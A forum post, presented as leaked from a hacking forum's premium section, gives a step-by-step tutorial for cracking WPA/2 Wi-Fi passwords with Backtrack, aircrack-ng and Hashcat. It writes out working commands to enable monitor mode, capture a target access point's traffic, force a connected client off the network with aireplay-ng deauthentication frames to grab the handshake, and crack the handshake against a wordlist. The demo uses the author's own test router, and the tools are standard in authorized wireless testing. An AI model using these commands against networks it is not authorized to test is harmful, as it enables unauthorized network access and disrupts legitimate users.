[BreShiE]

This post is leaked from the premium section of "Legion" on the competing hack forum. There will be 5 new leaks a day. There may be some format problems due to UTF8 character encoding.

In this tutorial, I will demonstrate how we can use both Windows and Linux to crack WPA/2 encryption.

The reason, I am using Windows and Linux Operating Systems, is because my Linux Os is running off a virtual machine. And due to limitations to the Hypervisor, virtual machines can't communicate directly with the graphics card itself. As result, I will be using my Windows machine that has a Nvidia GTX 465 graphics card to do all the WPA/2 key cracking.

Furthermore, another reason to use Linux is because of the Wireless Injection drivers that work better under Linux than under Windows. Even though, it is possible to inject wireless frames under Windows, the hardware is very expensive and not many of us are financially capable of affording one. So therefore, I highly recommend you to use Linux for this part of the tutorial.

I understand some of you out there, have little or no experience at all using Linux. That's why I made this tutorial as simple as possible. If you follow it carefully and put some effort into it, you will succeed.

WARNING: Before you proceed with the steps below, you must ensure you have a compatible hardware
or there won't be a guarantee that things will work for you.

1) Compatible adapters

Spoiler:

Alfa AWUS036H
Alfa AWUS036NHA

If your adapter is known to support Packet monitoring and Injection, you might as well just use it.
Or else you will need to purchase one of the adapters above.
Be aware that, only USB adapters will work with Virtualbox, if you have a built in or internal WIFI adapter it will NOT WORK!

2) Compatible graphics cards

Spoiler:

The AMD Radeonâ„¢ HD 7990 is highly recommended but any other AMD Radeonâ„¢ HD card can also be used.
Warning: Make sure, you use the Catalyst 13.1 drivers or Hashcat will not work.

The Nvidia GeForce GTX 690 is highly recommended but any other GTX card can also be used..

Step 1

Download Virtualbox from this URL
( https://www.virtualbox.org/wiki/Downloads )

Step 2

Download Backtrack from this URL
( http://www.backtrack-linux.org/downloads/ )
Remember to download the (Backtrack R3, X64 KDE) version.

Step 3

We need to setup our virtual machine, so that we can install Backtrack on it.
The Youtube videos below will walk you through the process of setting up and installing Backtrack on your VM.

How to create a Virtual Machine?

How to install Backtrack 5 R3?

Step 4

Now, we are going to download Hashcat and setup a working directory along with wordlists for it.
( http://hashcat.net/oclhashcat-plus/ )

Once you've downloaded the Hashcat files, create a folder in the root directory of you

C:\ drive and call it Hashcat. Then unzip all the file contents you've just downloaded in there. They should look like the screen shot below.

Step 5

Now we need to acquire our wordlists. The wordlists provided in the following URL are highly recommended.
Download whatever ones you can and save them into the Hashcat directory you've created.
If you require more wordlists, feel free to PM me!

( http://blog.g0tmi1k.com/2011/06/dictiona...lists.html )

Step 6

Let's get started, I am going to setup a target AP called "HackMe" and for the sake of this tutorial,
I will create a very simple pass-phrase, so that we can crack it successfully.

The Wireless Access Point that I am using, it's a NetGear N150 Wireless router WNR100 v3.
You can use any other brand or model of Wireless router that pleases you.

Now head over to your virtual machine and fire up your Backtrack 5 OS.
Once it's up and running, connect your WIFI adapter to your host system and issue the following command:

Code:

lsusb

The above command should output the following results, regarding the type of WIFI adapter you are using.



If you are not sure, or for some unknown reason you are adapter isn't being detected by your VM, watch the video below.

Step 7

Provided there are no errors or issues, let's first put our Wifi card into monitor mode and then after let's create a monitor mode interface called "Mon0". In your Backtrack 5 VM, open up a terminal and type the following commands:

Code:

airmon-ng

Then

Code:

airmon-ng start wlan0

Your screen should look similar to the screen shot below.

Step 8

Now that our WIFI card is in monitor monitor, we are going to use the Airodump-ng utility to monitor what Wireless networks are available for us.

In the terminal type airodump-ng followed by the monitor interface. The monitor interface will be "mon0". This can very depending on your adapter chipset.

Code:

airodump-ng mon0

As you can see from the screen shot below, our Wifi adapter has picked quite a few wireless networks. And our target AP "HackMe" is the first up on the list of available wireless networks.

Now that we identified our target of choice, lets instruct Airodump-ng to monitor the "HackMe" Wireless AP. And have it record all the wireless traffic to a .cap file so that we can capture the handshake, in order to crack the WPA/2 key.

Code:

airodump-ng --channel <target's channel> --bssid <Target AP's MAC address> -w HackMe mon0

In order to capture the WPA handshake, we can wait for a client to authenticate to our AP, or we can deauthenticate a client that is already authenticated.

To deauthenticate a client, we use the Aireplay-ng utility which is part of the Aircrack-ng suite. The command is as follows:

Code:

aireplay-ng -0 10 -a <MAC address of target AP> -c <MAC address of targeted client> mon0

The video below, will walk you through the process of capturing the traffic, deauthenticating the client and as well as verifying that you've captured a valid WPA handshake using Wireshark.

Step 9

Now that, we know the WPA handshake is valid. We use the Aircrack-ng utility to convert the HackME.cap file into a HackME.hccap file.
By default, Hashcat only take it's own .hccap file format. We can't use .pcap or .cap files as they are not supported file formats.

Converting the .cap file into the .hccap is very simple. First, we do an ls command to verify our HackMe.cap exists.

So the HackME.cap exist, now we use the following command to convert our .cap file.

Code:

aircrack-ng HackME.cap -J HackME.hccap

Aircrack-ng has now finished converting the .cap file. We now need to import the HackME.hccap file into our Windows machine, so that we can crack the WPA key with Hashcat.

To import the .hccap file, I will be using Dropbox. I will show you, how the installation is done on the Linux side.
On the Windows side it should be a straight and simple installation for a GUI guru like yourself.

Disclaimer

Spoiler:

The installation of Dropbox in Linux video was not published or created by me, I give full credits for the author.

Now let's put everything into practice.

Hashcat command:

Code:

cudaHashcat-plus64.exe -m 2500 HackMe-01.hccap rockyou.txt

Description:
The -m switch tells Hashcat what hash type to crack.

This is the file containing the handshake.

It's our wordlist.